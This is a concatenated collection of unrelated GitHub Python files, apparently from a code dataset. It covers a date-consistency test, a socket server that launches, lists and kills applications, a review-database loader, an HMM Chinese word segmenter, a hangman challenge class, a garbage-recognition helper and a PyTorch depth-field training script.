    _check_date_conditions_not_compatible([cd_2], date_)
    _check_date_conditions_not_compatible([cd_3], date_)
    _check_date_conditions_not_compatible([cd_4], date_)
    cd_5 = Littler(date_, dt_2)
    cd_6 = Greater(date_, dt_1)
    with pytest.raises(ParametrizationError):
        _check_date_conditions_not_compatible([cd_5, cd_6], date_)
    with pytest.raises(ParametrizationError):
        _check_date_conditions_not_compatible([cd_1, cd_6], date_)
    with pytest.raises(ParametrizationError):
        _check_date_conditions_not_compatible([cd_5, cd_1], date_)
| Envinorma/envinorma-data | tests/test_consistency.py | test_consistency.py | py | 4,939 | python | en | code | 4 | github-code | 90 |
72042627496 | import psutil
import signal
import sys
import os
from io import StringIO
from pywinauto import Desktop
from AppOpener import open
def openApp(clientsocket, appName):
    """Launch *appName* via AppOpener and report the result to the client.

    NOTE(review): `open` here is AppOpener.open (imported at module level),
    shadowing the builtin.  AppOpener prints its outcome, so stdout is
    temporarily captured to detect a "not found" failure.
    """
    original_stdout = sys.stdout
    captured_output = StringIO()
    sys.stdout = captured_output

    open(appName)

    # Reset the stdout back to original and get the message
    sys.stdout = original_stdout
    message = captured_output.getvalue().strip()

    if "not found" in message.lower():
        clientsocket.send("open_err".encode())
    else:
        clientsocket.send("open_ok".encode())
def killRunningApp(clientsocket, pid):
    """Terminate process *pid* with SIGTERM; report kill_ok/kill_err to the client."""
    try:
        os.kill(pid, signal.SIGTERM)
        clientsocket.send("kill_ok".encode())
    except:
        # Bare except: any failure (no such pid, permission, send error)
        # is reported the same way.
        clientsocket.send("kill_err".encode())

    # Sending a response to the client about the result
    # listRunningApp(clientsocket)
def checkValidApp(w):
    """Return 'pid,app_name,thread_count' for window *w*, or False if invalid.

    Windows with an empty title or the Taskbar are skipped; so are windows
    whose process disappeared before inspection.
    """
    try:
        full_title = w.window_text()
        if full_title == "Taskbar" or full_title == "": return False
        proc_id = w.process_id()
        process = psutil.Process(proc_id)
        thread_count = process.num_threads()
    except psutil.NoSuchProcess:
        return False

    # Titles like "Document - AppName": keep the part after the last " - ".
    if ' - ' in full_title:
        app_name = full_title.rsplit(' - ', 1)[1]
    else:
        app_name = full_title
    return f'{proc_id},{app_name},{thread_count}'
def send_string_list(client_socket, string_list):
    """Send a '|'-joined UTF-8 string list, preceded by a 4-byte big-endian length."""
    payload = '|'.join(string_list).encode('utf-8')
    header = len(payload).to_bytes(4, 'big')
    client_socket.sendall(header)
    client_socket.sendall(payload)
def listRunningApp(clientsocket):
    """Enumerate visible desktop windows and send the valid ones to the client."""
    windows = Desktop(backend="uia").windows()
    runningApp = []
    for w in windows:
        tmp = checkValidApp(w)  # False, or 'pid,name,threads'
        if (tmp == False) : continue
        runningApp.append(tmp)
    send_string_list(clientsocket, runningApp)
    print("DONE")
| chitien2808/Socket_Programming | server/handleRunningApp.py | handleRunningApp.py | py | 1,881 | python | en | code | 0 | github-code | 90 |
70456427177 | from SI507project_tools import Company, Review, session
import csv
def get_or_create_company(company_dic):
    """Return the existing Company matching *company_dic*, or stage a new one.

    NOTE(review): a newly created Company is added to the session but not
    returned; the caller commits the session afterwards.
    """
    company = Company.query.filter_by(name = company_dic["company"]).first()
    if company:
        print("This company has already existed.")
        return company
    if not company:
        new_company = Company(name = company_dic["company"], website = company_dic["website"], headquater = company_dic["headquater"], size=company_dic["size"] , founding_time=company_dic["founded"], company_type=company_dic["type"] , industry=company_dic["industry"], revenue=company_dic["revenue"], ceo=company_dic["ceo"])
        session.add(new_company)
def insert_company_data(company_dataset):
    """Load every row of the company CSV into the database, committing once."""
    with open(company_dataset, newline="") as csvfile:
        reader = csv.DictReader(csvfile)
        for line in reader:
            get_or_create_company(line)
    session.commit()
#### 2. Define the function for inserting review data ####
def get_or_create_review(review_dic):
    """Return the existing Review matching the CSV row's id, or stage a new one.

    NOTE(review): review_dic[""] is the CSV's unnamed index column, used as
    the primary key; the parent company must already exist by name.
    """
    review = Review.query.filter_by(id = review_dic[""]).first()
    if review:
        print("This review has already existed.")
        return review
    if not review:
        company_name = review_dic["company"]
        company_for_new_review = Company.query.filter_by(name = company_name).first()
        new_review = Review(id=review_dic[""],location=review_dic["location"], dates=review_dic["dates"], job_title=review_dic["job-title"], summary=review_dic["summary"], pros=review_dic["pros"], cons=review_dic["cons"], advice_to_mgmt=review_dic["advice-to-mgmt"], overall_rating=review_dic["overall-ratings"], work_balance_rating=review_dic["work-balance-stars"],culture_values_rating=review_dic["culture-values-stars"], career_opportunity_rating=review_dic["carrer-opportunities-stars"], comp_benefits_rating=review_dic["comp-benefit-stars"], senior_mgmt_rating=review_dic["senior-mangemnet-stars"], helpful_count=review_dic["helpful-count"], link=review_dic["link"], company_id=company_for_new_review.id)
        session.add(new_review)
def insert_review_data(review_dataset):
    """Load every row of the review CSV into the database, committing once."""
    with open(review_dataset, newline="") as csvfile:
        reader = csv.DictReader(csvfile)
        for line in reader:
            get_or_create_review(line)
    session.commit()
#### Initiating database ####
if __name__ == "__main__":
pass
| chenlicl0627/SI507-Final-Project | SI507project_db_populate.py | SI507project_db_populate.py | py | 2,323 | python | en | code | 0 | github-code | 90 |
34077748193 | from .nn.op import HMMlayer
import pickle
import re, sys, os
class SegModel():
    """Chinese word segmentation: max-forward-match over a dictionary, with an
    HMM (Viterbi via HMMlayer) fallback for unknown character runs.
    """
    def __init__(self, model_path):
        # Model file is a sequence of pickled objects, in this exact order.
        # NOTE(review): the file handle is never closed.
        model = open(model_path, 'rb')
        self.transitionProb = pickle.load(model)
        self.emissionProb = pickle.load(model)
        self.word_list = pickle.load(model)
        self.pi = pickle.load(model)
        self.states = pickle.load(model)   # e.g. B/M/E/S tag names
        self.word_dict = pickle.load(model)

    def catchStr(self, sentence):
        """Split *sentence* on punctuation, keeping each delimiter attached
        to the preceding segment."""
        l=[]
        l=re.split('(,|。|、|———|/|●)', sentence)
        values = l[::2]
        delimiters = l[1::2] + ['']
        return [v + d for v, d in zip(values, delimiters)]

    def convertSentence(self, sentence):
        """Map each character to its index in word_list.

        NOTE(review): unknown characters fall back to the index of '。',
        which assumes '。' is always present in word_list.
        """
        l=[]
        for word in sentence:
            try:
                l.append(self.word_list.index(word))
            except ValueError:
                l.append(self.word_list.index('。'))
        return l

    def outPutResult(self, sentence, s_seq, term_list, states):
        """Join characters into words: insert a space after E/S-tagged chars."""
        s = ''
        for i in range(len(sentence)):
            tag = states[s_seq[i]]
            if tag == 'E' or tag == 'S':
                # print(term_list[o_seq[i]], end=' ')
                s += sentence[i] + " "
            else:
                # print(term_list[o_seq[i]], end='')
                s += sentence[i]
        return s

    def mfm(self, string, max_len=5):
        """
        Max forward match

        Greedy dictionary matching up to *max_len* characters; consecutive
        single characters not in the dictionary are buffered in `unk` and
        segmented by the HMM instead.
        """
        def getSeg(text):
            # Longest dictionary prefix of *text* (single chars pass through).
            if not text:
                return ''
            if len(text) == 1:
                return text
            if text in self.word_dict:
                return text
            else:
                small = len(text) - 1
                text = text[0:small]
                return getSeg(text)
        max_len = max_len
        result_str = ''
        result_len = 0
        unk = ''
        while string:
            tmp_str = string[0:max_len]
            seg_str = getSeg(tmp_str)
            seg_len = len(seg_str)
            if seg_len == 1:
                unk += seg_str  # accumulate unknown run for the HMM
            else:
                if unk != '':
                    # Flush the pending unknown run through the HMM first.
                    s = self.hmm(unk)
                    result_str = result_str + s
                    unk = ''
                result_len = result_len + seg_len
            if seg_str.strip() and seg_len != 1:
                result_str = result_str + seg_str + ' '
            string = string[seg_len:]
        result_str = result_str + ' ' + self.hmm(unk)
        return result_str

    def hmm(self, sentence): # sentence: the text run to segment with the HMM
        """Viterbi-segment *sentence* window by window (split on punctuation)."""
        s=''
        # print(self.word_list)
        windows = self.catchStr(sentence)
        # print(windows)
        for s_window in windows:
            if s_window=='':
                continue
            # Append '。' as an end-of-window observation.
            o_seq = self.convertSentence(s_window+"。")
            s_seq=HMMlayer(o_seq, self.transitionProb, self.emissionProb, self.pi)
            s += self.outPutResult(s_window, s_seq, self.word_list, self.states)
        return s

    def cut(self, string):
        """Public entry point: segment *string* into space-separated words."""
        result = self.mfm(string)
        return result
43771475303 | fname = input("Enter file name: ")
if len(fname) < 1 : fname = "mbox-short.txt"  # default file for the exercise
count = 0
emails = list()
fh = open(fname)
for line in fh:
    line = line.rstrip()
    if not line.startswith("From "):continue
    words = line.split()
    # NOTE(review): `emails` is rebound to the *last* sender string each
    # iteration, so only the final address is printed below; append to the
    # list instead if every sender is wanted.
    emails = words[1]
    count = count + 1
print(emails)
print("There were", count, "lines in the file with From as the first word")
16786761912 | from extra.match.match import Match
class Challenge(Match):
    """A Match sent by one player to another, timestamped at creation."""

    from extra.word.word import Word
    from extra.player.player import Player

    __slots__ = ["_sender", "_timestamp"]

    def __init__(self, word: Word, receiver: Player, sender: Player, chances=5, timestamp=None):
        from datetime import datetime
        assert chances > 0, f"Chances {chances} must be non-negative"
        super().__init__(word, receiver, chances) # receiver is the player.
        self._sender = sender
        if timestamp is None:
            self._timestamp = datetime.now().__str__() # Timestamp
        else:
            self._timestamp = timestamp

    @property
    def sender(self):
        return self._sender

    @property
    def timestamp(self):
        return self._timestamp

    # Overridden method!
    def hand_results(self):
        """Persist the challenge outcome: update both players' stats and
        remove the challenge record from the database.

        NOTE(review): a receiver victory counts as a *defeat* for the sender
        (and vice versa) — confirm this mapping matches Status semantics.
        """
        from extra.match.status import Status
        from extra.data_persistence.database_manager import DatabaseManager
        self._sender.performance.challenges_made += 1
        self.player.performance.challenges_played += 1
        sender_data = {"challenges_made": self._sender.performance.challenges_made}
        player_data = {"challenges_played": self.player.performance.challenges_played}
        if self.status.status == Status.victory():
            self._sender.performance.challenge_defeats += 1
            self.player.performance.challenge_victories += 1
            sender_data["challenge_defeats"] = self._sender.performance.challenge_defeats
            player_data["challenge_victories"] = self.player.performance.challenge_victories
        else:
            self._sender.performance.challenge_victories += 1
            self.player.performance.challenge_defeats += 1
            sender_data["challenge_victories"] = self._sender.performance.challenge_victories
            player_data["challenge_defeats"] = self.player.performance.challenge_defeats
        self._sender.performance.calculate_new_yield_coefficient()
        self.player.performance.calculate_new_yield_coefficient()
        sender_data["yield_coefficient"] = self._sender.performance.yield_coefficient
        player_data["yield_coefficient"] = self.player.performance.yield_coefficient
        db = DatabaseManager()
        db.update_record("players", sender_data, {"nickname": self._sender.nickname})
        db.update_record("players", player_data, {"nickname": self.player.nickname})
        db.delete_record("challenges", {"receiver_nickname": self.player.nickname,
                        "sender_nickname": self._sender.nickname, "timestamp": self._timestamp})

    def __str__(self):
        # Serialized as the tuple persisted in the challenges table.
        data = (
            self._word.word,
            self._chances,
            self.player.nickname,
            self._sender.nickname,
            self._timestamp
        )
        return data.__str__()

    @classmethod
    def instantiate(cls, challenge_data: tuple):
        """Alternate constructor: rebuild a Challenge from its DB tuple
        (word, chances, receiver_nickname, sender_nickname, timestamp)."""
        assert len(challenge_data) == 5, "Data is invalid"
        from extra.data_persistence.database_manager import DatabaseManager
        from extra.word.word import Word
        db = DatabaseManager()
        receiver_player = db.select_player(challenge_data[2])
        sender_player = db.select_player(challenge_data[3])
        word_tuple = db.inspect_table("words", "*", {"word": challenge_data[0]}, "word")[0]
        assert len(word_tuple) == 3, "Word tuple is invalid"
        word = Word(word_tuple[0], word_tuple[1], word_tuple[2])
        return cls(word, receiver_player, sender_player, challenge_data[1], challenge_data[4])
| Fael123Programming/hangman-game-py | src/extra/challenge/challenge.py | challenge.py | py | 3,562 | python | en | code | 0 | github-code | 90 |
26988005872 | import os
from .img_recognition import recongnition
class Method(object):
    """Helper routines: save an uploaded photo, run image recognition on it,
    and turn the recognition output into the response dict for the front end."""

    def image_save(request, userId):
        """
        Save the photo uploaded by the user to the server and return the
        path where it was stored (only for POST requests).
        """
        import time
        base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
        # File name: timestamp plus the user's id.
        post_time = time.strftime('%Y-%m-%d_%H-%M-%S_') + '%s.jpg' % userId
        if request.method == 'POST':
            img = request.FILES.get('file')
            path = os.path.join(base_dir, 'images', post_time)
            with open(path, 'wb') as out:
                for chunk in img.chunks():
                    out.write(chunk)
            return path

    def image_processing(path):
        """
        Run image analysis on the saved photo; returns the recognition
        result on success, False otherwise.
        """
        return recongnition(path)

    def data_processing(s):
        """
        Interpret the analysis output ``s`` (site id, expected category key,
        per-category counts) and build the ``result`` dict for the front end:
        status flag, message, bin site and credit points.
        """
        result = {'status': False, 'message': '', 'site': '', 'credit': ''}
        menu = {'plastic': '塑料瓶', 'cans': '易拉罐', 'glass': '玻璃瓶', 'others': 'others'}
        # Human-readable names of every category actually detected in the image.
        detected = [menu.get(key) for key, count in s[2].items() if count > 0]
        expected = menu.get(s[1])
        if expected not in detected:
            result['message'] = '请放入%s' % expected
            return result
        if 'others' in detected:
            detected.remove('others')
        if len(detected) == 1:
            # Only the expected category was found: success, award credit.
            result['status'] = True
            result['message'] = '回收%s成功, 公益积分加%s分。' % (expected, s[2].get(s[1]))
            result['site'] = s[0]
            result['credit'] = s[2].get(s[1])
        else:
            # Other recyclables are mixed in: ask the user to sort them.
            detected.remove(expected)
            result['message'] = '除了%s还有%s, 请分类回收' % (expected, ' '.join(detected))
        return result
| wanghaininggg/Garbage-collection | code/wx_project/app1/function/processing.py | processing.py | py | 2,142 | python | en | code | 0 | github-code | 90 |
18244674659 | k,n = map(int,input().split())
A=list(map(int,input().split()) )
# For every adjacent pair of positions on a circle of circumference k, take the
# shorter arc between them; the answer is the minimum such arc over all pairs.
ans=10**10
for i in range(len(A)):
    # clockwise: going from position i to position i-1
    # arc does not pass position 0
    if A[i-1] - A[i] > 0:
        dist1 = A[i-1] - A[i]
    # arc passes position 0
    else:
        dist1 = A[i-1] + (k-A[i])
    # counter-clockwise: going from position i-1 to position i
    # NOTE(review): when A[i] < A[i-1] this branch yields A[i-1]-A[i] (a positive
    # value); confirm the intended direction/sign convention here.
    if A[i] - A[i-1] < 0:
        dist2 = A[i-1] - A[i]
    # arc passes position 0
    else:
        dist2 = A[i] + (k-A[i-1])
    dist = min(dist1,dist2)
    ans = min(ans,dist)
print(ans) | Aasthaengg/IBMdataset | Python_codes/p02725/s627644691.py | s627644691.py | py | 585 | python | en | code | 0 | github-code | 90 |
16836061380 | '''
Train a directed sdf network
'''
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
import argparse
import os
from tqdm import tqdm
import numpy as np
from sklearn.metrics import confusion_matrix
import matplotlib.pyplot as plt
import trimesh
import math
# from beacon.utils import saveLossesCurve
from data import DepthData, MultiDepthDataset
from model import LF4D, AdaptedLFN, SimpleMLP
import odf_utils
from camera import Camera, DepthMapViewer, save_video, save_video_4D
import sampling
import rasterization
import meshing_3d
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
torch.autograd.set_detect_anomaly(True)
def l2_loss(labels, predictions):
    '''
    Mean squared error between ``labels`` and ``predictions``.
    '''
    residual = labels - predictions
    return torch.mean(residual * residual)
def chamfer_loss_1d(ground_truth, predictions, gt_mask, pred_mask):
    '''
    A chamfer distance measure between a set of ground truth and predicted depth points.

    ground_truth / predictions: per-ray depth values (batch, n) -- assumed shape,
    inferred from the unsqueeze/cdist usage below; TODO confirm.
    gt_mask / pred_mask: boolean masks selecting which entries are real
    intersections; only pairs where both masks are true contribute.
    NOTE(review): relies on the module-level global ``device``.
    '''
    # Add a trailing singleton dim so torch.cdist treats each depth as a 1-D point.
    ground_truth = ground_truth.unsqueeze(2)
    predictions = predictions.unsqueeze(2)
    # we need to mask out the elements that aren't labeled as true intersections
    extended_gt_mask = gt_mask.unsqueeze(2)
    extended_gt_mask = extended_gt_mask.tile((1,1,pred_mask.shape[1]))
    extended_pred_mask = pred_mask.unsqueeze(1)
    extended_pred_mask = extended_pred_mask.tile((1,gt_mask.shape[1],1))
    # joint_mask[b, i, j] is true only when gt entry i and pred entry j are both real.
    joint_mask = torch.logical_and(extended_pred_mask, extended_gt_mask)
    dists = torch.cdist(ground_truth, predictions)
    # Invalid pairs are set to +inf so they never win the min below.
    masked_dists = torch.where(joint_mask, dists, torch.tensor(np.inf).to(device))
    # find the nearest point in the opposing set (mask out inf values in current set)
    gt_term = torch.min(masked_dists, dim=2)[0]
    gt_term = torch.where(gt_mask, gt_term, torch.tensor(0.).to(device))
    # Average nearest-neighbor distance per ray, normalized by the number of real gt points.
    gt_term = torch.sum(gt_term, dim=1) / torch.sum(gt_mask, dim=1)
    gt_term = torch.mean(gt_term)
    pred_term = torch.min(masked_dists, dim=1)[0]
    pred_term = torch.where(pred_mask, pred_term, torch.tensor(0.).to(device))
    pred_term = torch.sum(pred_term, dim=1) / torch.sum(pred_mask, dim=1)
    pred_term = torch.mean(pred_term)
    # Symmetric chamfer distance: average the gt->pred and pred->gt terms.
    return 0.5 * (gt_term + pred_term)
def intersection_count_loss(ground_truth, predictions):
    """Mean absolute difference between the number of ground-truth and predicted
    intersections per ray (both counts obtained by thresholding at 0.5).

    NOTE(review): sqrt(square(x)) is just |x|, and the thresholded counts are
    integer-valued, so this provides no useful gradient -- confirm intended use.
    """
    # seems like this might zero out the gradients
    return torch.mean(torch.sqrt(torch.square(torch.sum(ground_truth > 0.5, dim=1) - torch.sum(predictions > 0.5, dim=1))))
def push_top_n(gt_int, pred_int):
    '''
    BCE loss that, for a ray with n ground-truth intersections, labels n of the
    ascending-sorted prediction outputs as positive.

    NOTE(review): the docstring originally said "top n", but labelling
    ``[:n]`` of an ascending sort marks the n *smallest* outputs -- confirm
    whether ``[-n:]`` (or a descending sort) was intended.
    '''
    # Number of ground-truth intersections per ray (float tensor).
    n_ints = torch.sum(gt_int, dim=1)
    # Sort predictions ascending along the intersection dimension.
    pred_sorted = torch.sort(pred_int, dim=1)[0]
    sorted_labels = torch.zeros(pred_sorted.shape)
    # Bug fix: iterate over row indices (shape[0] is an int, not an iterable)
    # and cast the per-ray count to int so it can be used as a slice bound.
    for i in range(sorted_labels.shape[0]):
        sorted_labels[i, :int(n_ints[i])] = 1.
    bce = nn.BCELoss(reduction="mean")
    # Move labels to the predictions' device (instead of the module-level
    # global) so the loss also works on CPU inputs.
    return bce(pred_sorted, sorted_labels.to(pred_int.device))
def train_epoch(model, train_loader, optimizer, lmbda, coord_type, unordered=False):
    '''
    Run one optimization epoch over ``train_loader`` and return the epoch's
    average (total, intersection, depth) losses.

    lmbda scales the depth term relative to the intersection term.
    coord_type selects which precomputed coordinate parameterization of each
    batch is fed to the model.
    unordered switches to the chamfer/push_top_n losses that do not assume an
    ordering of the per-ray depth outputs.
    NOTE(review): relies on the module-level global ``device``.
    '''
    ce = nn.CrossEntropyLoss(reduction="mean")
    bce = nn.BCELoss(reduction="mean")  # NOTE(review): unused in this function
    total_loss = 0.
    sum_int_loss = 0.
    sum_depth_loss = 0.
    total_batches = 0
    for batch in tqdm(train_loader):
        coordinates = batch[f"coordinates_{coord_type}"].to(device)
        intersect = batch["intersect"].to(device)
        n_ints = batch["n_ints"].to(device)
        depth = batch["depths"].to(device)
        pred_int, pred_depth = model(coordinates)
        if unordered:
            # mask of rays that have any intersections (gt & predicted)
            gt_any_int_mask = torch.any(intersect > 0.5, dim=1)
            pred_any_int_mask = torch.any(pred_int > 0.5, dim=1)
            combined_int_mask = torch.logical_and(gt_any_int_mask, pred_any_int_mask)
            depth_loss = lmbda * chamfer_loss_1d(depth[combined_int_mask], pred_depth[combined_int_mask], (intersect > 0.5)[combined_int_mask], (pred_int > 0.5)[combined_int_mask])
            intersect_loss = push_top_n(intersect, pred_int)
        else:
            # Ordered case: flatten everything and supervise depth only on
            # entries labeled as real intersections.
            intersect = intersect.reshape((-1,))
            depth = depth.reshape((-1,))
            pred_depth = pred_depth.reshape((-1,))
            n_ints = n_ints.reshape((-1))
            depth_loss = lmbda * l2_loss(depth[intersect > 0.5], pred_depth[intersect > 0.5])
            # Intersection count treated as a classification target.
            intersect_loss = ce(pred_int, n_ints.long())
        loss = intersect_loss + depth_loss
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
        sum_int_loss += intersect_loss.detach()
        sum_depth_loss += depth_loss.detach()
        total_loss += loss.detach()
        total_batches += 1.
    avg_loss = float(total_loss/total_batches)
    avg_int_loss = float(sum_int_loss/total_batches)
    avg_depth_loss = float(sum_depth_loss/total_batches)
    print(f"Average Loss: {avg_loss:.4f}")
    print(f"Average Intersect Loss: {avg_int_loss:.4f}")
    print(f"Average Depth Loss: {avg_depth_loss:.4f}")
    return avg_loss, avg_int_loss, avg_depth_loss
def test(model, test_loader, lmbda, coord_type, unordered=False):
    '''
    Evaluate ``model`` over ``test_loader`` (no gradients) and print the
    average loss, an intersection confusion matrix with accuracy /
    precision / recall / F1, and mean/median absolute depth errors.

    Parameters mirror train_epoch; nothing is returned, results are printed.
    NOTE(review): relies on the module-level global ``device``.
    '''
    ce = nn.CrossEntropyLoss(reduction="mean")
    bce = nn.BCELoss(reduction="mean")  # NOTE(review): unused in this function
    total_loss = 0.
    total_batches = 0.
    total_chamfer = 0.
    all_depth_errors = []
    all_int_pred = []
    all_int_label = []
    int_tn = 0.
    int_fp = 0.
    int_fn = 0.
    int_tp = 0.
    with torch.no_grad():
        for batch in tqdm(test_loader):
            coordinates = batch[f"coordinates_{coord_type}"].to(device)
            intersect = batch["intersect"].to(device)
            n_ints = batch["n_ints"].to(device)
            depth = batch["depths"].to(device)
            pred_int, pred_depth = model(coordinates)
            if unordered:
                # mask of rays that have any intersections (gt & predicted)
                gt_any_int_mask = torch.any(intersect > 0.5, dim=1)
                pred_any_int_mask = torch.any(pred_int > 0.5, dim=1)
                combined_int_mask = torch.logical_and(gt_any_int_mask, pred_any_int_mask)
                depth_loss = lmbda * chamfer_loss_1d(depth[combined_int_mask], pred_depth[combined_int_mask], (intersect > 0.5)[combined_int_mask], (pred_int > 0.5)[combined_int_mask])
                intersect_loss = push_top_n(intersect, pred_int)
            else:
                intersect = intersect.reshape((-1,))
                depth = depth.reshape((-1,))
                pred_depth = pred_depth.reshape((-1,))
                n_ints = n_ints.reshape((-1))
                depth_loss = lmbda * l2_loss(depth[intersect > 0.5], pred_depth[intersect > 0.5])
                intersect_loss = ce(pred_int, n_ints.long())
            # this is all to compute the confusion matrix
            pred_n_ints = torch.argmax(pred_int, dim=1)
            # create binary labels for each intersection: one-hot the predicted
            # count, cumulative-sum, then invert so the first n entries are true.
            pred_int_mask = torch.nn.functional.one_hot(pred_n_ints.to(torch.int64), pred_int.shape[1])
            pred_int_mask = torch.cumsum(pred_int_mask, dim=1)
            pred_int_mask = torch.logical_not(pred_int_mask)
            pred_int_mask = pred_int_mask[:,:-1]
            pred_int_mask = pred_int_mask.reshape((-1)).cpu().numpy()
            all_int_pred.append(pred_int_mask)
            loss = intersect_loss + depth_loss
            all_depth_errors.append(torch.abs(depth[intersect > 0.5] - pred_depth[intersect > 0.5]).cpu().numpy())
            all_int_label.append(intersect.cpu().numpy().flatten())
            if unordered:
                total_chamfer += depth_loss / lmbda
            total_loss += loss.detach()
            total_batches += 1.
    print(f"\nAverage Test Loss: {float(total_loss/total_batches):.4f}")
    if unordered:
        print(f"Average Chamfer Loss: {(total_chamfer / total_batches):.4f}")
    print("Confusion Matrix Layout:")
    print("[[TN FP]\n [FN TP]]")
    print("\nIntersection-")
    int_confusion_mat = confusion_matrix(np.hstack(all_int_label), np.hstack(all_int_pred)>0.5)
    int_tn = int_confusion_mat[0][0]
    int_fp = int_confusion_mat[0][1]
    int_fn = int_confusion_mat[1][0]
    int_tp = int_confusion_mat[1][1]
    int_precision = int_tp/(int_tp + int_fp)
    int_recall = int_tp/(int_tp + int_fn)
    int_accuracy = (int_tn + int_tp)/np.sum(int_confusion_mat)
    print(f"Average Intersect Accuracy: {float(int_accuracy*100):.2f}%")
    print(f"Intersect Precision: {int_precision*100:.2f}%")
    print(f"Intersect Recall: {int_recall*100:.2f}%")
    print(f"Intersect F1: {2*(int_precision*int_recall)/(int_precision + int_recall):.4f}")
    print(int_confusion_mat)
    print("\nDepth-")
    all_depth_errors = np.hstack(all_depth_errors)
    print(f"Average Depth Error: {np.mean(all_depth_errors):.4f}")
    print(f"Median Depth Error: {np.median(all_depth_errors):.4f}\n")
def viz_depth(model, verts, faces, radius, show_rays=False):
    '''
    Visualize learned depth map and intersection mask compared to the ground truth.
    Renders four fixed cameras zooming out along +x and opens a DepthMapViewer.
    TODO: add depth map legend
    '''
    fl = 1.0
    sensor_size = [1.0,1.0]
    resolution = [100,100]
    # Four cameras on the +x axis, each 0.2 further out, looking at the origin.
    zoom_out_cameras = [Camera(center=[1.25 + 0.2*x,0.0,0.0], direction=[-1.0,0.0,0.0], focal_length=fl, sensor_size=sensor_size, sensor_resolution=resolution) for x in range(4)]
    data = [cam.mesh_and_model_depthmap(model, verts, faces, radius, show_rays=show_rays, fourd=True) for cam in zoom_out_cameras]
    # Per-view color normalization bounds over pixels that actually intersect
    # (in either the mesh or the model depth map).
    vmin = [min(np.min(mesh_depths[mesh_n_ints > 0.5]) if np.any(mesh_n_ints > 0.5) else np.inf, np.min(model_depths[model_n_ints > 0.5]) if np.any(model_n_ints > 0.5) else np.inf) for mesh_n_ints, mesh_depths, model_n_ints, model_depths in data]
    vmax = [max(np.max(mesh_depths[mesh_n_ints > 0.5]) if np.any(mesh_n_ints > 0.5) else -np.inf, np.max(model_depths[model_n_ints > 0.5]) if np.any(model_n_ints > 0.5) else -np.inf) for mesh_n_ints, mesh_depths, model_n_ints, model_depths in data]
    # Fall back to the raw model depths when a view has no intersections at all.
    vmin = [vmin[i] if vmin[i] < np.inf else np.min(data[i][3]) for i in range(len(vmin))]
    vmax = [vmax[i] if vmax[i] > -np.inf else np.max(data[i][3]) for i in range(len(vmax))]
    DepthMapViewer(data, vmin, vmax, fourd=True)
def equatorial_video(model, verts, faces, radius, n_frames, resolution, save_dir, name):
    '''
    Saves a rendered depth video from around the equator of the object.
    Cameras orbit in the xz-plane at distance ``radius``, all looking at the
    origin; output is written under ``save_dir``/depth_videos.
    '''
    video_dir = os.path.join(save_dir, "depth_videos")
    if not os.path.exists(video_dir):
        os.mkdir(video_dir)
    # these are the normalization bounds for coloring in the video
    vmin = radius - 1.
    vmax = radius + 1.
    fl = 1.0
    sensor_size = [1.0,1.0]
    resolution = [resolution,resolution]
    angle_increment = 2*math.pi / n_frames
    z_vals = [np.cos(angle_increment*i)*radius for i in range(n_frames)]
    x_vals = [np.sin(angle_increment*i)*radius for i in range(n_frames)]
    circle_cameras = [Camera(center=[x_vals[i],0.0,z_vals[i]], direction=[-x_vals[i],0.0,-z_vals[i]], focal_length=fl, sensor_size=sensor_size, sensor_resolution=resolution, verbose=False) for i in range(n_frames)]
    rendered_views = [cam.mesh_and_model_depthmap(model, verts, faces, radius, fourd=True) for cam in tqdm(circle_cameras)]
    save_video_4D(rendered_views, os.path.join(video_dir, f'4D_equatorial_{name}_rad{radius*100:.0f}.mp4'), vmin, vmax)
def generate_point_cloud(model, sphere_vertices, vertices, faces, focal_point=[0., 0., 0.], show=True):
    '''
    Returns the 1st, 2nd, 3rd, and 4th+ intersection point clouds produced by shooting rays from the
    sphere vertices towards the focal point.
    NOTE(review): only the minimum-depth (first) intersection per ray is
    actually returned (torch.min over dim 1) -- the docstring overstates this.
    Entries are None for rays the model reports as never intersecting.
    '''
    focal_point = np.array(focal_point)
    # Unit directions from each sphere vertex toward the focal point.
    ray_directions = [(focal_point-v) / np.linalg.norm(focal_point-v) for v in sphere_vertices]
    with torch.no_grad():
        # pass in surface point, direction
        _, depths, n_ints = model.query_rays(torch.tensor(sphere_vertices, dtype=torch.float32), torch.tensor(ray_directions, dtype=torch.float32))
    n_ints = n_ints.cpu()
    model_depths = depths.cpu()
    model_depths = torch.min(model_depths, dim=1)[0]
    model_depths = model_depths.numpy()
    # Walk each ray forward by its predicted depth; inf depth means no hit.
    new_points = [sphere_vertices[i] + ray_directions[i]*model_depths[i] if model_depths[i] < np.inf else None for i in range(len(sphere_vertices))]
    if show:
        # can't import visualization on OSCAR because it uses Open3D and OpenGL
        import visualization
        lines = np.concatenate([faces[:,:2], faces[:,1:], faces[:,[0,2]]], axis=0)
        visualizer = visualization.RayVisualizer(vertices, lines)
        for point in new_points:
            if point is not None:
                visualizer.add_point(point, [52./255., 88./255., 235./255.])
        visualizer.display()
    # TODO: save to file
    return new_points
def generate_simple_mesh(model, sphere_vertices, sphere_faces, focal_point=[0.,0.,0.], show=True):
    '''
    Returns a mesh produced by shooting rays from the sphere vertices towards the focal point.
    Each sphere vertex is moved inward by the model's first predicted depth;
    rays with no predicted intersection keep their original sphere position,
    so the sphere connectivity (``sphere_faces``) stays valid.
    '''
    focal_point = np.array(focal_point)
    ray_directions = [(focal_point-v) / np.linalg.norm(focal_point-v) for v in sphere_vertices]
    with torch.no_grad():
        # pass in surface point, direction
        _, depths, n_ints = model.query_rays(torch.tensor(sphere_vertices, dtype=torch.float32), torch.tensor(ray_directions, dtype=torch.float32))
    n_ints = n_ints.cpu()
    model_depths = depths.cpu()
    model_depths = torch.min(model_depths, dim=1)[0]
    model_depths = model_depths.numpy()
    new_points = [sphere_vertices[i] + ray_directions[i]*model_depths[i] if model_depths[i] < np.inf else sphere_vertices[i] for i in range(len(sphere_vertices))]
    if show:
        # can't import visualization on OSCAR because it uses Open3D and OpenGL
        import visualization
        import open3d as o3d
        o3d.visualization.draw_geometries([visualization.make_mesh(np.array(new_points), sphere_faces)])
    # TODO: save to file
    return new_points
if __name__ == "__main__":
    # Entry point: parse CLI flags, build the model/dataset, then run any of
    # the requested actions (train / test / save / visualize / render video).
    print(f"Using {device}")
    parser = argparse.ArgumentParser(description="A script to train and evaluate a directed distance function network")
    # CONFIG
    parser.add_argument("--n_workers", type=int, default=0, help="Number of workers for dataloaders. Recommended is 2*num cores")
